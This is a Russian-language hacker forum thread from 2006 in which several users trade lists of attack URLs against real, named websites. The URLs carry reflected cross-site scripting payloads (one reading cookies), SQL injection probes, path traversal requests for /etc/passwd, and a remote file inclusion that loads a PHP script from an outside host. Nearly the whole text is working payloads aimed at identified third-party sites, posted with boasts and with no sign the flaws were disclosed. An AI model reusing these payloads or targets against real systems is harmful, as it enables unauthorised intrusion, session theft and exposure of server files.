_http://av.rds.yahoo.com/_ylt=A9ibyKYyWWxEDRIBWWFSDqMX;_ylu=X3oDMTBxMXBrZzZ zBHBndANhdl93ZWJfaG9tZQRzZWMDc2VhcmNo/SIG=11ofahvej/EXP=1148037810/*-http%3A//www.altavista.com/web/results?itag=ody&q=LOOL&kgs=0&kls=0"><script>alert(/SLIP/)</script>
XSS:
_http://www.delphimaster.ru/cgi-bin/search.pl?words=%3Cscript%3Ealert%28%2FNeX+aka+Neo %2F%29%3C%2Fscript%3E&n=0
Ещё пачка xss:
_http://tourism.at.ru/htsearch.cgi?config=tourism&method=and&format=flong&words=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscrip t%3E"><script>alert(/SLIP/)</script>
_http://hp.qsrch.com/apps/eps/eps.cgi?Keywords=%3Cimage+style%3Dbackground%3Aurl %28javascript%3Aalert%28%2FSLIP%2F%29%29%3E&loc=ST&upartner=hp03&ps=H3OTGE
_http://www.db.am/search/?wrds=%3Cimage%20style%3Dbackground%3Aurl%28javasc ript%3Aalert%28%2FSLIP%2F%29%29%3E&pg=&cat=&pa=&pb=&oo=
_http://capel.ru/search.php?search=%3Cscript%3Ealert%28%27SLIP%27%2 9%3C%2Fscript%3E
_http://www.labar.ru/?ann=0&str=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscript% 3E
_http://www.search.uz/go.php?w=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fsc ript%3E&where=directory&action=search&Submit=%EF%EE%E8%F1%EA
degeneration x
18.05.2006, 21:05
_http://www.smchat.ru/chat.php?chatname=%3Cscript%3Ealert();%3C/script%3ESAMPLE
Всем привет) Вот прошёлся по сайтам в которых есть поисковые системы)
_http://eda-server.ru/cgi-bin/search/search.pl?stype=AND&stpos=0&query=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscrip t%3E&ok2.x=33&ok2.y=11
_http://www.printinfo.ru/searchRes.asp?SST=LOL"><script>alert(/slip/)</script>
_http://www.xfiles.ru/sudis/?action=search&vopros=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscri pt%3E&stype=txt
_http://www.ural.ru/index/ru?act=search&SM=UralOnline&qs=slip"><script>alert(/slip/)</script>
_http://www.bizcenter.com.ua/search.php?sf=slip&wh=2"><script>alert(/slip/)</script>
_http://www.itshop.ru/dynacatalog.asp?words=%3Cscript%3Ealert%28%2Fslip% 2F%29%3C%2Fscript%3E
_http://www.infocity.kiev.ua/search.php?newsearch=1&name=on&autor=on&des=on&sline=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscrip t%3E
_http://www.koders.com/?s=slip&_%3Abtn=Search&_%3Ala=*&_%3Ali=*"><script>alert(/slip/)</script>
Всё, на сегодня хватит)
back0rifice
19.05.2006, 01:25
_http://www.crpg.ru//header.php (мля, прямо не сайт, а один сплошной баг :) )
_http://www.nevasport.ru/news.php?id=12061'
_http://www.southexpo.ru/expo/detail.asp?id=529'
_http://www.southexpo.ru/expo/detail.asp?id=52.9
_http://www.southexpo.ru/expo/detail.asp?id=52,9
_http://www.mos.ru/cgi-bin/pbl_web?vid=1&osn_id=0' (в мыльнике имеем имя админа, может, кому-то что-то и даст)
_http://www.telcenter.ru/page.php?pageId=52'
_http://www.ht.ru/on-line/forum/?forum=7&topic=547'
_http://www.magazin.ru/scripts/magazin/Dir.pl?dir=%2F%27%D4%EE%F2%EE%F2%E5%F5%ED%E8%EA%E0&cont=on&search=%3Cscript%3Ealert%28%2Fok%2F%29%3C%2Fscript %3E
_http://www.stroylocman.ru/cats.html?q=%3Cscript%3Ealert%28%27f0und+by+back0r ifice%27%29%3C%2Fscript%3E
_hxxp://www.telecom.kz/index.php?content='
_hxxp://www.mospat.ru/index.php?mid=84
*Chakir*
19.05.2006, 07:47
_http://www.ozon.ru/context/kidworld_detail/id/2266364/default.aspx?Name=&Title="&
gt;<script>alert()</script>&EMail=&Description="><script>
;alert()</script>&Country=Россия/&ViewComment=Просмотреть#comment
_http://ishodniki.ru/ilook/search.php?query='style=background:url(JaVaScRiPt: alert());&
m=or
_http://by.ru/cat.cgi?query="><script>alert()</script>
_http://linuxcenter.ru/news/2005<textarea>/11
_http://www.koders.com/?s="><script>alert()</script>&_:btn=Search&a
mp;_:la=*&_:li=*
_http://www11.pochta.ru/info.php?mid=agreement&lng=ru"><script>alert()</script>
_http://games.icq.com/?code=110272767&RefId=910"><script>alert()</script>&lc=en
_http://aromas.ru/forum/search.php?text_poisk='
Вот в дополнение к тем xss в поисковиках, которые лежат на предыдущей странице этой темы)
_http://search.km.ru/index.asp?sq=%3Cscript%3Ealert%28%2Fslip%2F%29%3C% 2Fscript%3E
_http://directory.jayde.com/search?a=0&query=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscrip t%3E&search=search
XSS на Mail.Ru
http://top3.mail.ru/stat?id=110605;what="><script>alert("found_by_gLAnce")</script><xml>
XSS на Hotbox.ru ;)
_http://www.hotbox.ru/help.php?lng=ru&skin=pochta_ru"><script>alert(/slip/)</script>
_http://www3.pochta.ru/regform.php?sid=e2314aca38596502e5d4c0605802d511&lng=ru&rnd=517025057"><script>alert(/slip/)</script>
degeneration x
20.05.2006, 19:58
XSS на Jino.ru
http://jino.ru/buywizard.phtml?dom=%3Cscript%3Ealert();%3C/script%3Eicq&tld=ru&price=14.99
http://jino.ru/buywizard.phtml?dom=icq&tld=%3Cscript%3Ealert();%3C/script%3Eru&price=14.99
XSS на post.kards.ru
http://post.kards.ru/?act=search&level=6&search_str=%22%3E%3Cscript%3Ealert();%3C/script%3E&site_id=2
XSS на forum.nokia.com
http://sn.nokia.com/search?keywords=%22%3E%3Cscript%3Ealert();%3C/script%3E
На игромании выкопал:
_http://search.igromania.ru:17000/igromania?text=has"><script>alert(/slip/)</script>
Зашёл за свежим винампом на оффициальный сайт, в глаза сразу бросился поиск по сайту, вообще ничего не фильруется, всё сразу принял):
_http://www.winamp.com/videos/search.php?q=%3Cscript%3Ealert%28%2Fslip%2F%29%3C% 2Fscript%3E
degeneration x
21.05.2006, 10:21
Вот ещё с Winamp.com
http://www.winamp.com/videos/browse.php?&genre=Pop%3Cscript%3Ealert();%3C/script%3E&type=video
podkashey
21.05.2006, 14:44
_http://www.club.veresk.ru/?part_id=17%27
Хакерский сайт;)
_http://pro-hack.ru/archive/search.php?news=on&exploit=on&download=on"><script>alert(/slip/)</script>
Это просто так:
_http://www.zachot.ru/index.php?id=2&letter=Н"><script>alert(/slip/)</script>
podkashey
22.05.2006, 13:57
http://www.amik.ru/?page=search&step=1&keywords=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript %3E&how=0 в поиске.
Помимо этого есть активная XSS в самой почте, выкладывал где-то месяц-два назад.
Если кому интересно о чем там пишет масляков... ;)))
back0rifice
23.05.2006, 05:25
_http://www.astrotop.ru/cgi/rubr.cgi?id=535'
_http://www.astrotop.ru/cgi/rubr.cgi?id=53,5
_http://www.docflow.ru/analytic_full.asp?param=3283,4
_http://www.edu.ru/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=1847(
_http://www.gelezo.net/comments.php?id=20060322150220'
_http://www.infosystem.ru/longkurs.php?fid=1123500873655060'
_http://www.infosystem.ru/longkurs.php?fid=112350087365506,0
_http://www.internet.news.az/showart.php?id=4541'
_http://www.ipages.ru/index.php?id=2518'
_http://www.ipages.ru/index.php?id=2519'
_http://www.itartass.ur.ru/analit/review/?id=158'
_http://www.liberal.ru/sitan.asp?Rel=137'
_http://www.lrn.ru/index.php?module=news&action=thread&newsid=10519'
_http://www.mka.ru/jet.php
_http://www.mka.ru/?p=40464'
_http://www.netlab.ru/News/hotnews/descr1.asp?id=2752'
_http://www.netlab.ru/News/hotnews/descr1.asp?id=275,2
_http://www.strana-oz.ru/print.php
_http://www.strana-oz.ru/print.php?type=article&id=1139'
_http://www.strana-oz.ru/?numid=26&article=1139'
_http://www.syrus.ru/index.cgi?Template=all_firms&FirmId=55'
_http://www.svop.ru/live/arrangements.asp?p_id=624,6
_http://www.technet.ru/index.php?r=14'
_http://www.trade.polesye.net/catalog.php?catid=40&id=578'
_http://www.voenpravo.km.ru/view/view_print.asp?id='
_http://www.voltairenet.org/mot60.html?lang=ru(
_http://search.5ballov.ru/search.shtml?cfg=5ballov&query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cat=Referats
[Mail.ru]
http://top.mail.ru/stat?id=8821&what=diff&period="><script>alert("Отсоси%20Майл%20-%20found%20by%20gLAnce")</script>
EST a1ien
23.05.2006, 19:50
[Earthlink.Net]
https://fma.myaccount.earthlink.net/fma/register_error.jsp?error=<script>alert('A skolko tut 6`ti znakov mama maya :)')</script>
back0rifice
24.05.2006, 03:47
_http://www.1gb.ru/default.aspx?ti=6&hti=99'
_http://www.academy.ru/CATALOG/COURSE.ASP?courseID=668'
_http://www.academy.it.ru/edu/courses.html?cid=1304'
_http://www.academy.softjoys.ru/courses.php?direction=3&course=56'
_http://www.academy.softjoys.ru/courses.php?direction=7&course=237'
_http://all-hack.info/index.php?categoryid=8&p2_articleid=154
_http://www.articles.org.ru/cfaq/index.php?qid=1427'
_http://www.asutp.ru/jet.php
_http://www.asutp.ru/?p=205965'
_http://www.avalon.ru/ITCourses/Microsoft/Courses/About/?CourseID=118'
_http://www.biolite.ru/ru/aboutmy/?type=purpose&id=1(
_http://www.compress.ru/issue.aspx?iid=743'
_http://www.compress.ru/issue.aspx?iid=74,3
_http://www.cosmos-stc.ru/?pageId=34'
_http://www.dialog-21.ru/full_digest.asp?digest_id=55473(
_http://www.dialog-21.ru/digest.asp?parent_menu_id=947&digest_id=55451(
_http://www.dkws.org.ua/index.php?page=show&file=a/dev/docs/docum2 обратите внимание на саму строку запроса
_http://www.docflow.ru/analytic_full.asp?param=3067,2
_http://www.e-consulting.com.ua/solutions/details.get?id=16'
_http://www.inno.ru/projects/show/?id=1064'
_http://www.inno.ru/projects/show/?id=2632(
_http://www.intertade.ru/price.php?group=10224&type=(
_http://www.itshop.ru/Level2.asp?Category=8&Firm=0&Type=soft'
_http://www.leximus.ru/index.php?menu=8'
_http://www.listsoft.ru/search.php?q=%3Cscript%3Ealert%28%29%3C%2Fscript%3 E§ion=soft&progs=yes&arts=yes&tips=yes&progname=yes&progdescr=yes&progurl=yes&artname=yes&art=yes&tipname=yes&tip=yes
_http://www.maik.ru/cgi-bin/list.pl?page=prog(
_http://oraclub.trecom.tomsk.su/db/web.page?pid=1082'
_http://www.pmed.ru/conf/index.php?id=13164'
_http://www.quantumart.ru/news_and_events_new.asp?p_MenuAlias=n2006&p_NewsYear=2006&p_news_id=245,0
_http://www.rocit.ru/news/shownews.php3?id=9290(
_http://www.rsci.ru/nko/?action=newsc&id=2851'
_http://www.un.org/russian/radio/story.asp?NewsID=152'
_http://www.un.org/russian/radio/story.asp?NewsID=15,2
_http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=29'
_http://www.unixdoc.ru/index.php?mode=2&podmode=1' !!!LOL!!!
_http://www.usurt.ru/ru/data/index2.phtml?cat='
_http://www.usurt.ru/ru/data/index2.phtml?cat=7&id=21'
_http://www.vseo.ru/viewitems.php?word=782'
_http://www.veb-master.com/link/poisk.php?poisk=%3Cscript%3Ealert%28%29%3C%2Fscrip t%3E
_http://www2.zr.ru/magzr/geta.asp?zr=199903024'
_http://mp3.xss.ru/ На главной странице в поисковик вбивайте <script>alert(/slip/)</script> и всё.
_http://whois.mazafaka.ru/index.php?domain=%3Cscript%3Ealert%28%2Fslip%2F%29 %3C%2Fscript%3E&go=who%27s+this%3F
------------------
ЗЫ Всё же есть дыры у мазафаки)
degeneration x
24.05.2006, 16:33
http://www.dvd.ru/dvd.phtml?id=%3Cscript%3Ealert();%3C/script%3E56
http://www.gameauctions.ru/auction/auctiondetails.php?id=100439%3Cscript%3Ealert();%3 C/script%3E
_http://www.isotra.cz/czech/product.php?query=54%27
_http://hp.qsrch.com/apps/eps/eps.cgi?prt=hp03&uuid=67b0795864c9d6f84de322f426cc8788&s=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&submit=Go
ЛОЛ)
_http://www.intuit.ru/help/
Там на сайте написано, если вы заметили ошибку выделите и нажмите клавиши .......... и т.д.
Выделяем любой тескт на странице, нажимаем Ctrl+Enter, выпадает окошко с потверждением об отправке ошибки, нажимаем ОК. Появляется запрос сценария, вбиваем туда: <script>alert(/slip/)</script>
И успешно появляется алерт, потом сразу же пишет что сообщение отправлено:)
EST a1ien
24.05.2006, 19:49
http://unixbeginner.com/index.php?page=1001&error=%3Cscript%3Ealert(/a1ien/)%3C/script%3E
:)
_http://www.kazan.ru/list/list.php3?
cid=999+union+select+16,null/*
_http://bulgarbank.ru/index.php?page=news%27
ZetRider
24.05.2006, 20:05
http://www.yuretz.ru/prikol.php?id=384\'
http://forum.farit.ru/calendar.php?s=&action=edit&eventid=14\'
http://www.naec.ge/?search_string=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://www.xoxma.od.ua/xoxma/10/473\'
http://www.koms.ru/forum(page2).php?conf=aa
http://www.tom-muck.com/blog/master.cfm?searchbox=\"><script>alert()</script>&Submit=Search
http://www.tom-muck.com/blog/index.cfm?month=12&year=2005&newsmonth=12/1/2005\'
http://www.webbe.de/index.shtml?CONTENT=search&SEARCHACTION=search&LANG=de&SEARCH=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3 E&ASSOCIATION=OR
http://mobile.optima.ua/bomba.php?c_id=10\'&lim=40\'\"><script>alert()</script>
http://comp-lik.biz/index.php?q=<script>alert()</script>&search_news=1&search_articles=1&search_downloads=1&search_links=1&search_faq=1&search_gallery=1&search_static=1&p=query&area=1
http://comp-lik.biz/index.php?categ=9\'&parent=0&p=downloads&area=1
http://www.prokredo.ru/ru/library/index.php?q13=&t13=&c13=20\'&show13=materials
http://card.romanticcollection.ru/toprated.php?page=<script>alert()<script>
http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&submit=OK
http://www.paladins.ru/znaxar.php?free=\"><script>alert(1)</script>&sila1=3\"><script>alert(2)</script>&lovk1=3\"><script>alert(3)</script>&intuiz1=3\"><script>alert(4)</script>&vinos1=12\"><script>alert(5)</script>&intel1=\"><script>alert(6)</script>&mudr1=\"><script>alert(7)</script>&sila2=\"><script>alert(8)</script>&lovk2=\"><script>alert(9)</script>&intuiz2=\"><script>alert(10)</script>&vinos2=\"><script>alert(11)</script>&intel2=\"><script>alert(12)</script>&mudr2=\"><script>alert(13)</script>&flag=2\"><script>alert(14)</script>
http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script>
http://nakarte.rambler.ru/moscow/?query=%27
http://www.mebelm.com/search/?q=\'
http://www.ddd.kursknet.ru/cgi-bin/chat.pl?id=&language=<script>alert()</script>
http://games.alkar.net/csreg/chpass.php?filled=&account=\"><script>alert()</script>&password=&sendpass=
http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search=\"><script>alert()</script>
http://7000.ru/computers/details.php?id=2\'
http://www.softportal.com/search.php?search=1&search_string=\"><script>alert()</script>
http://catalog.begun.ru/?q=\"><script>alert()</script>
http://cio.iv.ru/search.html в поиске sql пример 666\'
http://www.3a.kiev.ua/good.php?name=<script>alert()</script>
http://referat.na5.ru/load.php?id=504948\'
http://referat.apple-online.ru/index.php?type=diplom_1&id=3478\'
http://www.mobiteka.ru/melodies/melodies.shtml?artid=27\'
http://valinfo.ru/testresult.php?idtestgroup=0\'
http://www.newstrack.ru/newstrack3/portal/news/view/20050414/a/
http://www.1bb.ru/directory.php?cat=35\'
http://orsn.rambler.ru/baza/consult/index.php?action=tema&kod=1\"><script>alert()</script>
http://katz.ws/?q=\"><script>alert()</script>
http://www.flashmaster.ru/search/index.php?words=\'
http://www.flashmaster.ru/search/index.php?words=%5C%27§ion%5B%5D%3Dnews§ion%5B%5D%3Dcatalog§ion%5B%5D%3Duser§ion%5B%5D%3Drating§ion%5B%5D%3Dswf§ion%5B%5D%3Dforum&page=17
http://www.ext.ru/?id=7\"><script>alert()</script>
http://bbcom.ch/index.php?suche_wort=\"><script>alert()</script>
http://www.igromania.ru/games/?666\'
http://www.spguwc.h15.ru/gb/index.php?action=viewcomments
http://search.cstrike.ru/?search=\'
http://search.gamestone.ru/?search=<script>alert()</script>
http://3mp3.ru/ru/search/text/?request=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript %3E&what=all
http://holidayclub.inprogress.ru/catalog/index.php?flet=\"><script>alert()</script>&Co=4&Re=460
http://hotels.wia.ru/<script>alert()</script>
http://encycl.accoona.ru/?word=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://www.bioone.org/bioone/?request=<script>alert()</script>
http://www.openhardware.net/?file=<script>alert()</script>
http://www.avionicsmagazine.com/cgi/av/show_mag.cgi?pub=av&file=../../../../../../../../../../../etc/passwd
http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd
http://alumni.calstatela.edu/document.cgi?section=about&file=../../../../../../../../../../../etc/passwd
http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
http://www.linuxhq.com/perl-bin/search_db?q=%27style%3Dbackground%3Aurl%28javascri pt%3Aalert%28%29%29%3B%27&qid=4&spp=20
http://seminar.spylog.ru/?rp=seminars/descr/15\'/
http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1\'
http://hw.ru/hi-tech/Login.jsp?login=\'\"><script>alert(1)</script>&password=\'\"><script>alert(2)</script>
http://www.srb.ru/search-results/?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&m=all&wm=wrd&ps=10&page=0
http://www.profits.ru/login.php?w=user&o=login&e=u\'
http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
http://smchat.ru/?s=reguser&login=\"><script>alert()</script>
http://www.film.ru/search.asp?what=%22style%3Dbackground%3Aurl%28java script%3Aalert%28%29%29%3B%22&where=root&mode=medium
http://www.mtve.com/index.php?Page=2\"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1\";</script><script>alert()</script>
http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3 E&index-grp=Public__FULL&index-type=t&type-index=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3 E
http://serial.com/?show=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&submit=Search
http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1\"style=background:url(javascript:alert());\"
http://poisk.ru/#\"><script>alert()</script>
http://an.aport.ru/scripts/template.dll?That=ref&r=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&Base=referat&Rt=2
http://www.sexvideogid.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E
http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170\"><script>alert()</script>
http://catalog.aport.ru/rus/themes.aspx?id=1778\'\"><xz>
http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url=\"style=background:url(javascript:alert());\"
http://www.iceberg.ru/services/?id=23\'&parent=0
http://xxx-dosug.com.ru/gallery-333-7.html
http://www.footbolka.ru/catalog/index.php?ref=xren'
http://www.whoistar.com/content/view/55/1'/
http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&vari=2<script>alert()</script>
http://www.allpravo.ru/?id=88&type=0&query='"
http://www.classis.ru/cgi-bin/links/classis/review.cgi?Review_Subject=&Review_ByLine=%22style%3Dbackground%3Aurl%28javasc ript%3Aalert%281%29%29%3B%22&Review_Contents=&Review_GuestName=%22style%3Dbackground%3Aurl%28jav ascript%3Aalert%282%29%29%3B%22&Review_GuestEmail=%22style%3Dbackground%3Aurl%28ja vascript%3Aalert%283%29%29%3B%22&ID=7981&add_this_review=1&add_review=%C4%EE%E1%E0%E2%E8%F2%FC+%EE%F2%E7%FB%E 2
http://www.refer.ru/menu?a=select_add&id="><script>alert()</script>
http://test.msk.ru/cgi-bin/searchdiplom2.cgi?words=%3Cscript%3Ealert%28%29%3C %2Fscript%3E
http://wwc.ru/index.php?do=search&ss=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert());"
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3 E&phone=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3 E&j_address=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscri pt%3E&m_address=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscri pt%3E&org=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3Cscript%3Ealert(6)</script>¤cy=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2&L1=1&L2=2&EXT=0&s=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://bugs.php.net/report.php?in%5Bdid_luser_search%5D=0&in%5Bemail%5D=&in%5Bphp_version%5D=%27%22%3E%3Cscript%3Ealert%28% 29%3C%2Fscript%3E&in%5Bbug_type%5D=*General+Issues&in%5Bphp_os%5D=&in%5Bsdesc%5D=&in%5Bpasswd%5D=&captcha=&in%5Bldesc%5D=&in%5Brepcode%5D=&in%5Bexpres%5D=&in%5Bactres%5D=
http://www.cafepress.com/cp/search/search.aspx?source=searchBox&q=%27%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cfpt2=&copt=&cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>
http://www.openet.ru/University.nsf/Index.htm!Open&Menu=VPMain&VPID=965"%20style=background:url(javascript:alert());"
http://www.cracklab.ru/xxx/ [POST] " style=background:url(javascript:alert());"
http://www.freedisk.ru/guide.php?cat=11"><script>alert()</script>
http://www.rabota.ru/search/vacancy/?search='"><script>alert()</script>
http://www.forum.md/Albums.aspx?soundslike=<xml>
http://nasa.org/static.asp?search_text=%22style%3Dbackground%3Aurl %28javascript%3Aalert%28%29%29%3B%22&search_source=20
http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=66&start=11"><script>alert()</script>
http://www.999.md/results.asp?criteria=%3Cscript%3Ealert%28%29%3C%2F script%3E&lng=1&topic=-1
http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&catref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24<script>alert()</script>&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=&sabdhi=&saprclo="><script>alert(5)</script>&saprchi='"><script>alert(/k1b0rg/)</script>
http://www.diary.ru/interest/?q=%22style=background:url(javascript:alert());"
http://www.wargames.ru/search.php?query=%27
http://www.ccg.ru/sections.php?op=listarticles&secid=285'
http://www.rolemancer.ru/search.php?query=%27
http://rulezzz.dp.ua/fotos/<script>alert()</script>
http://listsoft.ru/search.php?q=%27%22%3E%3Cscript%3Ealert%28%29%3C%2 Fscript%3E§ion=soft&progs=yes&arts=yes&tips=yes&progname=yes&progdescr=yes&progurl=yes&artname=yes&art=yes&tipname=yes&tip=yes
http://opengl.net/ поиск "style=background:url(javascript:alert());"
http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script>
http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437
http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background:url(javascript:alert(1));&u="style=background:url(javascript:alert(2));&ih=296&iw=425&th=84&tw=122&id=I-RBtbW0cGoJ
http://megafon.buongiorno.com/megafon/web/russian/index.html где просят номер телефона (+7....)Можно вводить любой код
http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28%29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_DIETS=&x=0&y=0
http://lafox.net/shop/?gid=73'"><script>alert()</script>
http://www.hacktivist.net/anarchy/index.php?action=search'
http://www.sexonly.ru/katalog.php?ganr=20'
http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script>
http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script>
http://www.osmarket.ru/products/5'
http://zubov.net/666"%20style=background:url(javascript:alert());".cfm?nft=1&t=5&p=1
http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script>
ZetRider
24.05.2006, 20:07
http://www.phrack.org/search/index.php?author=&andor=or&title="%20style=background:url(javascript:alert());"&comment=&submit=submit
http://www.xakep.ru/local/include/iframe_rateit.asp?filedir=25244"><script>alert()</script>
http://otdell.bs.by/show.html?words...C%2 Fscript%3E
http://www.missworld.tv/bio/bio.sps?iBiographyID=51851'
http://www.latin.ru/cgi-bin/search/odm.pl?search="><script>alert()</script>
http://yellowpages.rin.ru/cgi-bin/s...ript%3E&srt=not
http://www.linuxchile.cl/docs.php?op=ver&id=65'
http://www.hw.ru/hi-tech/recordUsers1.jsp?login="><script>alert()</script>
http://www.superq.ru/comments.php?id=82_0_1_0_C"><script>alert()</script>
http://[любой_сайт_использующий_webmo ney_transfer].webmoney.ru/conf/pci_testlink.asp?A=1</xmp><script>alert(1)</script>&b=1<script>alert(2)</script>
http://xtools.org/"%20style=background:url(javascript:alert());".cfm?nft=1&t=6&p=1
http://www.pro-hack.ru/tools/ip.html?myname=%3Cscript%3Ealert%28%29%3C%2Fscript %3E&ipname=&search=
http://geo.webmoney.ru/asp/wmobjects_in_moscow.asp?al=0"><script>alert()</script>
http://zloy.org/news/686'/index.html
http://www.cyberinfo.ru/cgi-bin/proxy/proxy.cgi?host=%3Cscript%3Ealert%28%29%3C%2Fscript %3E&port=8080
http://skvoznoy.org/news-cat/21'/
http://www.kkunst.com/kk/print.php?file='
http://top.voffka.com/search.php?key=%3Cscript%3Ealert%28%29%3C%2Fscript %3E&cat=Overall
http://www.leg.state.fl.us/statutes/index.cfm?StatuteYear=2005&AppMode=Display_Results&Mode=Search%2520Statutes&Submenu=2&Tab=statutes&Search_String=%22+style%3Dbackground%3Aurl%28javas cript%3Aalert%28%29%29%3B
http://search.mcc.ac.uk/cgi-bin/htsearch?config=mhn&words=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
http://koffiejunk.nl/?file=<script>alert()</script>
http://www.oil-gas.com.ua/data/rus/showdoc.php?file=<script>alert()</script>
http://www.frozenlight.de/engine/show.php?file=<script>alert()</script>
http://www.globalschoolbus.com/tools/tool_page.php?file=\
http://www.cairchicago.org/ournews.php?file=<script>alert()</script>
http://chrisken.utacm.org/cksource.php?file=/home/chrisken/www/code/ckSource.php
http://wwwx.cs.unc.edu/~jsterrel/test/viewsource.php?file=viewsource.php
http://foreverblue.alsgekken.nl/showdoc.php?file=http://kobeluga.narod.ru/nst.php
http://www.nesprogramme.org/download.php?file=../../../../../../../../../../../../etc/passwd
http://www.bissettmags.com.au/cgi-bin/cc_site_manager.pl?sessionKey=107919190464.68.82.1 0&file=../../../../../../../../../../../../etc/passwd
http://www.frostjedi.com/terra/scripts/graemlin/viewsource.php?file=graemlin.php
http://www.theater-schwedt.de/index.php?file=../../../../../../../../../../../../etc/passwd&mex=7
http://beer.km.ru/index.php?file=/etc/passwd
http://www.bobdev.com/downloadstats.php?File=<script>alert()</script>
http://www.mercenaries.ru/inf/newcomm.php?type=gallery&nick=%21+%21+%21+MAXIMILIAN+%21+%21+%21"><script>alert()</script>&page=1
http://voronezh.net/job/read_vac.php?cat=1&limit=&from=20%27
http://www.u-antona.vrn.ru/gallery/showgallery.php?mcats=all&si=&what=allfields&name='&when=&whenterm=
http://www.terms.ru/search.php?words=%3Cscript%3Ealert%28document.cook ie%29%3C%2Fscript%3E
http://www.ret.ru/getpictspr.jsp?gid=229969%27
http://smi.rambler.ru/main.cgi?action=query%3Cscript%3Ealert%28%29%3C%2F script%3E&mh=t%27&wa=
http://whois.mazafaka.ru/?domain=%27&x=0&y=0
http://chat.vrn.ru/cgi-bin/h_grep.cgi?channel=piligrim&day=&nick=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&sub=Find
http://www.skychat.ru/people/lost.php?PHPSESSID=><script>alert()</script>&NewPassword=1&PasswordHint=1&nick=1&PasswordHint1=1&Password=1&Password2=1
http://www.skychat.ru/people/lost.php?PHPSESSID=431798c8970a49ca53b92bff3839591 9&NewPassword=1&PasswordHint=1&nick=<script>alert()</script>&PasswordHint1=1&Password=1&Password2=1
http://www.skychat.ru/people/form.php?sess=><script>alert()</script>&cid=-1888213412&comp_info=1&comp_info2=1&HTTP_USER_AGENT=1
http://rcw-team.ru/tools/base64/base64-result.php?encode=&decode=PHNjcmlwdD5hbGVydCgnTWF0cml4IGhhcyBhbmQgeW9 1IScpPC9zY3JpcHQ%2B
http://www.aist.ru/search/?action=index&text=%27&x=32&y=11
http://www.scoopthis.com/pages/article.cgi?file=../../../../../../../../../../etc/passwd
http://www.netcat.ru/search/?action=index&text=%27
